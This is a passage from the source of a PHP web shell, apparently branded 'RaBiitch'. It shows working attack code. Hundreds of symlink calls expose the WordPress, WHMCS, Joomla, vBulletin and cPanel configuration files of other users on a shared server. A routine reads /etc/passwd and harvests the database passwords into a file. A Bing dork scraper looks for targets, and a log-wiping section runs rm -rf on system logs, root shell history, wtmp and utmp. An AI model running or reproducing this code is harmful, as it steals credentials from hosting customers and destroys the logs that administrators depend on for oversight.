  2604. @symlink('/home9/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2605. @symlink('/home9/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2606. @symlink('/home9/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2607. @symlink('/home9/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2608. @symlink('/home9/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2609. @symlink('/home9/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2610.  
  2611. //home 10
  2612.  
  2613. @symlink('/home10/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2614. @symlink('/home10/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2615. @symlink('/home10/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2616. @symlink('/home10/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2617. @symlink('/home10/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2618. @symlink('/home10/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2619. @symlink('/home10/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2620. @symlink('/home10/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2621. @symlink('/home10/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2622. @symlink('/home10/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2623. @symlink('/home10/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2624. @symlink('/home10/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2625. @symlink('/home10/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2626. @symlink('/home10/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2627. @symlink('/home10/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2628. @symlink('/home10/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2629. @symlink('/home10/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2630. @symlink('/home10/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2631. @symlink('/home10/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2632. @symlink('/home10/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2633. @symlink('/home10/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2634. @symlink('/home10/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2635. @symlink('/home10/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2636. @symlink('/home10/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2637. @symlink('/home10/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2638. @symlink('/home10/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2639. @symlink('/home10/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2640. @symlink('/home10/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2641. @symlink('/home10/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2642. @symlink('/home10/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2643. @symlink('/home10/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2644. @symlink('/home10/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2645. @symlink('/home10/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2646. @symlink('/home10/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2647. @symlink('/home10/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2648. @symlink('/home10/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2649. @symlink('/home10/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2650. @symlink('/home10/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2651. @symlink('/home10/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2652. @symlink('/home10/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2653. @symlink('/home10/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2654. @symlink('/home10/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2655. @symlink('/home10/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2656. @symlink('/home10/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2657. @symlink('/home10/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2658. @symlink('/home10/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2659. @symlink('/home10/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2660. @symlink('/home10/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2661. @symlink('/home10/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2662. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2663. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2664. @symlink('/home10/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2665. @symlink('/home10/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2666. @symlink('/home10/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2667. @symlink('/home10/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2668. @symlink('/home10/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2669. @symlink('/home10/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2670. @symlink('/home10/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2671. @symlink('/home10/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2672. @symlink('/home10/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2673. @symlink('/home10/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2674. @symlink('/home10/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2675. @symlink('/home10/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2676. @symlink('/home10/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2677. @symlink('/home10/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2678. @symlink('/home10/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2679. @symlink('/home10/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2680. @symlink('/home10/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2681. @symlink('/home10/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2682. @symlink('/home10/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2683. @symlink('/home10/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2684. @symlink('/home10/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2685. @symlink('/home10/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2686. @symlink('/home10/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2687. @symlink('/home10/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2688. @symlink('/home10/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2689. @symlink('/home10/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2690. @symlink('/home10/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2691. @symlink('/home10/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2692. @symlink('/home10/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2693. @symlink('/home10/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2694. @symlink('/home10/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2695. @symlink('/home10/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2696. @symlink('/home10/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2697. @symlink('/home10/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2698. @symlink('/home10/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2699. @symlink('/home10/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2700. @symlink('/home10/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2701. @symlink('/home10/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2702. @symlink('/home10/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2703. @symlink('/home10/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2704. @symlink('/home10/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2705. @symlink('/home10/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2706. @symlink('/home10/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2707. @symlink('/home10/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2708. @symlink('/home10/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2709. @symlink('/home10/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2710. @symlink('/home10/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2711. @symlink('/home10/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2712. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2713. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2714. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2715. @symlink('/home10/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2716. @symlink('/home10/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2717. @symlink('/home10/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2718. @symlink('/home10/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2719. @symlink('/home10/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2720. @symlink('/home10/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2721. @symlink('/home10/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2722. @symlink('/home10/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2723. @symlink('/home10/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2724. @symlink('/home10/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2725. @symlink('/home10/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2726. @symlink('/home10/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2727. @symlink('/home10/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2728. @symlink('/home10/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2729. @symlink('/home10/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2730. @symlink('/home10/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2731. @symlink('/home10/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2732. @symlink('/home10/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2733. @symlink('/home10/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2734. @symlink('/home10/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2735. @symlink('/home10/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2736. @symlink('/home10/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2737. @symlink('/home10/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2738. @symlink('/home10/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2739. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2740. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2741. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2742. @symlink('/home10/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2743. @symlink('/home10/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2744. @symlink('/home10/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2745. @symlink('/home10/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2746. @symlink('/home10/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2747. @symlink('/home10/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2748. @symlink('/home10/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2749. @symlink('/home10/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2750. @symlink('/home10/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2751. @symlink('/home10/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2752. @symlink('/home10/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2753. @symlink('/home10/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2754. @symlink('/home10/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2755. @symlink('/home10/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2756. @symlink('/home10/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2757. @symlink('/home10/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2758. @symlink('/home10/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2759. @symlink('/home10/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2760. @symlink('/home10/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2761. @symlink('/home10/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2762. @symlink('/home10/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2763. @symlink('/home10/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2764. @symlink('/home10/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2765. @symlink('/home10/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2766. @symlink('/home10/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2767. @symlink('/home10/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2768. @symlink('/home10/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2769. @symlink('/home10/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2770. @symlink('/home10/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2771. @symlink('/home10/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2772. @symlink('/home10/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2773. @symlink('/home10/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2774. @symlink('/home10/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2775. @symlink('/home10/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2776. @symlink('/home10/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2777. @symlink('/home10/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2778. @symlink('/home10/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2779. @symlink('/home10/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2780. @symlink('/home10/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2781. @symlink('/home10/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2782. @symlink('/home10/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2783. @symlink('/home10/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2784. @symlink('/home10/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2785. @symlink('/home10/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2786. @symlink('/home10/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2787. @symlink('/home10/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2788. @symlink('/home10/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2789. @symlink('/home10/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2790. @symlink('/home10/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2791. @symlink('/home10/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2792. @symlink('/home10/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2793. @symlink('/home10/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2794. @symlink('/home10/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2795. }
  2796.  
  2797. //password grab
  2798.  
  2799. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2800. {
  2801.  
  2802. $ar0=explode($marqueurDebutLien, $text);
  2803. $ar1=explode($marqueurFinLien, $ar0[1]);
  2804. $ar=trim($ar1[0]);
  2805. return $ar;
  2806. }
  2807.  
  2808. $ffile=fopen('Passwords.txt','a+');
  2809.  
  2810.  
  2811. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/RaBiitch_symconf/";
  2812. $re=$r;
  2813. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2814.  
  2815. $users=file("/etc/passwd");
  2816. foreach($users as $user)
  2817. {
  2818.  
  2819. $str=explode(":",$user);
  2820. $usersss=$str[0];
  2821. foreach($confi as $co)
  2822. {
  2823.  
  2824.  
  2825. $uurl=$re.$usersss.$co;
  2826. $uel=$uurl;
  2827.  
  2828. $ch = curl_init();
  2829.  
  2830. curl_setopt($ch, CURLOPT_URL, $uel);
  2831. curl_setopt($ch, CURLOPT_HEADER, 1);
  2832. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2833. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2834. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2835. $result['EXE'] = curl_exec($ch);
  2836. curl_close($ch);
  2837. $uxl=$result['EXE'];
  2838.  
  2839.  
  2840. if($uxl && preg_match('/table_prefix/i',$uxl))
  2841. {
  2842.  
  2843. //Wordpress
  2844.  
  2845. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2846. if(!empty($dbp))
  2847. $pass=$dbp."\n";
  2848. fwrite($ffile,$pass);
  2849.  
  2850. }
  2851. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2852. {
  2853.  
  2854. //WHMCS
  2855.  
  2856. $dbp=entre2v2($uxl,"db_password = '","';");
  2857. if(!empty($dbp))
  2858. $pass=$dbp."\n";
  2859. fwrite($ffile,$pass);
  2860.  
  2861. }
  2862.  
  2863.  
  2864. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2865. {
  2866.  
  2867. //Joomla
  2868.  
  2869. $db=entre2v2($uxl,"password = '","';");
  2870. if(!empty($db))
  2871. $pass=$db."\n";
  2872. fwrite($ffile,$pass);
  2873. }
  2874. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2875. {
  2876.  
  2877. //Vbulletin
  2878.  
  2879. $db=entre2v2($uxl,"password'] = '","';");
  2880. if(!empty($db))
  2881. $pass=$db."\n";
  2882. fwrite($ffile,$pass);
  2883.  
  2884. }
  2885. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2886. {
  2887.  
  2888. //Other
  2889.  
  2890. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2891. if(!empty($db))
  2892. $pass=$db."\n";
  2893. fwrite($ffile,$pass);
  2894. }
  2895. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2896. {
  2897.  
  2898. //Other
  2899.  
  2900. $db=entre2v2($uxl,"dbpass = '","';");
  2901. if(!empty($db))
  2902. $pass=$db."\n";
  2903. fwrite($ffile,$pass);
  2904. }
  2905. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2906. {
  2907.  
  2908. //Other
  2909.  
  2910. $db=entre2v2($uxl,"dbpass = '","';");
  2911. if(!empty($db))
  2912. $pass=$db."\n";
  2913. fwrite($ffile,$pass);
  2914.  
  2915. }
  2916. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2917. {
  2918.  
  2919. //Other
  2920.  
  2921. $db=entre2v2($uxl,"dbpass = \"","\";");
  2922. if(!empty($db))
  2923. $pass=$db."\n";
  2924. fwrite($ffile,$pass);
  2925. }
  2926.  
  2927.  
  2928. }
  2929. }
  2930. echo "<center>
  2931. <a href=\"RaBiitch_symconf/root/\">Root Server</a>
  2932. <br><a href=\"RaBiitch_symconf/Passwords.txt\">Passwords</a>
  2933. <br><a href=\"RaBiitch_symconf/\">Configurations</a></center>";
  2934. }
  2935. else
  2936. {
  2937. echo "<center>
  2938. <form method=\"POST\">
  2939. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2940. $file = '/etc/passwd';
  2941. $read = @fopen($file, 'r');
  2942. if ($read){
  2943. $body = @fread($read, @filesize($file));
  2944. echo "".htmlentities($body)."";
  2945. }
  2946. elseif(!$read)
  2947. {
  2948. $read = @show_source($file) ;
  2949. }
  2950. elseif(!$read)
  2951. {
  2952. $read = @highlight_file($file);
  2953. }
  2954. elseif(!$read)
  2955. {
  2956. for($uid=0;$uid<1000;$uid++)
  2957. {
  2958. $ara = posix_getpwuid($uid);
  2959. if (!empty($ara))
  2960. {
  2961. while (list ($key, $val) = each($ara))
  2962. {
  2963. print "$val:";
  2964. }
  2965. print "\n";
  2966. }}}
  2967.  
  2968. flush();
  2969.  
  2970. echo "</textarea>
  2971. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2972. </form></center>";
  2973. }
  2974. }
  2975. } elseif(isset($_GET['RaBiitch']) && ($_GET['RaBiitch'] == 'bing'))
  2976. { @ini_set('output_buffering',0);
  2977. ?>
  2978. <head>
  2979. <style type="text/css">
  2980. textarea {
  2981. width: 500px;
  2982. height: 250px;
  2983. border: 1px solid #000000;
  2984. margin: 5px auto;
  2985. padding: 7px;
  2986. }
  2987. input[type=text] {
  2988. padding-left: 7px;
  2989. width: 250px;
  2990. height: 25px;
  2991. border: 1px solid #000000;
  2992. background: blue;
  2993. margin: 5px auto;
  2994. }
  2995. </style>
  2996. </head>
  2997. <center><form method="post">
  2998. Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  2999. <input type="submit" name="go" value=">>">
  3000. </form>
  3001. <?php
  3002. // coded by Mr. Magnom
  3003. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  3004. // greetz to Mr. Magnom - Sanjungan Jiwa
  3005. function getsource($url, $proxy) {
  3006. $curl = curl_init($url);
  3007. curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  3008. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3009. if($proxy) {
  3010. $proxy = explode(':', autoprox());
  3011. curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  3012. curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  3013. }
  3014. $content = curl_exec($curl);
  3015. curl_close($curl);
  3016. return $content;
  3017. }
  3018. $dork = htmlspecialchars($_POST['dork']);
  3019. $do = urlencode($dork);
  3020. if(isset($_POST['go'])) {
  3021. $npage = 1;
  3022. $npages = 30000;
  3023. $allLinks = array();
  3024. $lll = array();
  3025. while($npage <= $npages) {
  3026. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  3027. if($x) {
  3028. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  3029. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  3030. $npage = $npage + 10;
  3031. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  3032. } else break;
  3033. }
  3034. $URLs = array();
  3035. foreach($allLinks as $url){
  3036. $exp = explode("/", $url);
  3037. $URLs[] = $exp[2];
  3038. }
  3039. $array = array_filter($URLs);
  3040. $array = array_unique($array);
  3041. $sss = count(array_unique($array));
  3042. echo "ToTaL SiTe : $sss<br>";
  3043. foreach($array as $domain) {
  3044. echo "http://$domain/<br>";
  3045. }
  3046. }
  3047. }elseif($_GET['RaBiitch'] == 'info') {
  3048. echo '<br><table width="700" align="center">
  3049. <tr><td>
  3050. <center>
  3051. System : '.$sys.'<br>
  3052. IP : '.$ip.'<br>
  3053. Safe Mode : '.$sm.'<br>
  3054. Disabled Functions : '.$ds.'<br>
  3055. Home_root : '.$home_r.'
  3056. </center>
  3057. </td></tr>
  3058. </table>';
  3059. }elseif($_GET['RaBiitch'] == 'kill') {
  3060. $fileini = $_SERVER['SCRIPT_FILENAME'];
  3061. rmdir('RaBiitch_sym');rmdir('RaBiitch_conf');unlink($fileini);
  3062. echo 'Good By User :)';
  3063. }elseif($_GET['RaBiitch'] == 'logs') {
  3064. echo '<br><center><b><span>Pengaman Bro ( Sefty Can Be Fun )</span></b><center><br>';
  3065. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
  3066. exec("rm -rf /tmp/logs");
  3067. exec("rm -rf /root/.ksh_history");
  3068. exec("rm -rf /root/.bash_history");
  3069. exec("rm -rf /root/.bash_logout");
  3070. exec("rm -rf /usr/local/apache/logs");
  3071. exec("rm -rf /usr/local/apache/log");
  3072. exec("rm -rf /var/apache/logs");
  3073. exec("rm -rf /var/apache/log");
  3074. exec("rm -rf /var/run/utmp");
  3075. exec("rm -rf /var/logs");
  3076. exec("rm -rf /var/log");
  3077. exec("rm -rf /var/adm");
  3078. exec("rm -rf /etc/wtmp");
  3079. exec("rm -rf /etc/utmp");
  3080. exec("rm -rf $HISTFILE");
  3081. exec("rm -rf /var/log/lastlog");
  3082. exec("rm -rf /var/log/wtmp");
  3083.  
  3084. shell_exec("rm -rf /tmp/logs");
  3085. shell_exec("rm -rf /root/.ksh_history");
  3086. shell_exec("rm -rf /root/.bash_history");
  3087. shell_exec("rm -rf /root/.bash_logout");
  3088. shell_exec("rm -rf /usr/local/apache/logs");
  3089. shell_exec("rm -rf /usr/local/apache/log");
  3090. shell_exec("rm -rf /var/apache/logs");
  3091. shell_exec("rm -rf /var/apache/log");
  3092. shell_exec("rm -rf /var/run/utmp");
  3093. shell_exec("rm -rf /var/logs");
  3094. shell_exec("rm -rf /var/log");
  3095. shell_exec("rm -rf /var/adm");
  3096. shell_exec("rm -rf /etc/wtmp");
  3097. shell_exec("rm -rf /etc/utmp");
  3098. shell_exec("rm -rf $HISTFILE");
  3099. shell_exec("rm -rf /var/log/lastlog");
  3100. shell_exec("rm -rf /var/log/wtmp");
  3101.  
  3102. passthru("rm -rf /tmp/logs");
  3103. passthru("rm -rf /root/.ksh_history");
  3104. passthru("rm -rf /root/.bash_history");
  3105. passthru("rm -rf /root/.bash_logout");
  3106. passthru("rm -rf /usr/local/apache/logs");
  3107. passthru("rm -rf /usr/local/apache/log");
  3108. passthru("rm -rf /var/apache/logs");
  3109. passthru("rm -rf /var/apache/log");
  3110. passthru("rm -rf /var/run/utmp");
  3111. passthru("rm -rf /var/logs");
  3112. passthru("rm -rf /var/log");
  3113. passthru("rm -rf /var/adm");
  3114. passthru("rm -rf /etc/wtmp");
  3115. passthru("rm -rf /etc/utmp");
  3116. passthru("rm -rf $HISTFILE");
  3117. passthru("rm -rf /var/log/lastlog");
  3118. passthru("rm -rf /var/log/wtmp");
  3119.  
  3120.  
  3121. system("rm -rf /tmp/logs");
  3122. sleep(2);
  3123. echo'<br>Sudah Terpasang Pengaman .../tmp/logs ';
  3124. sleep(2);
  3125.  
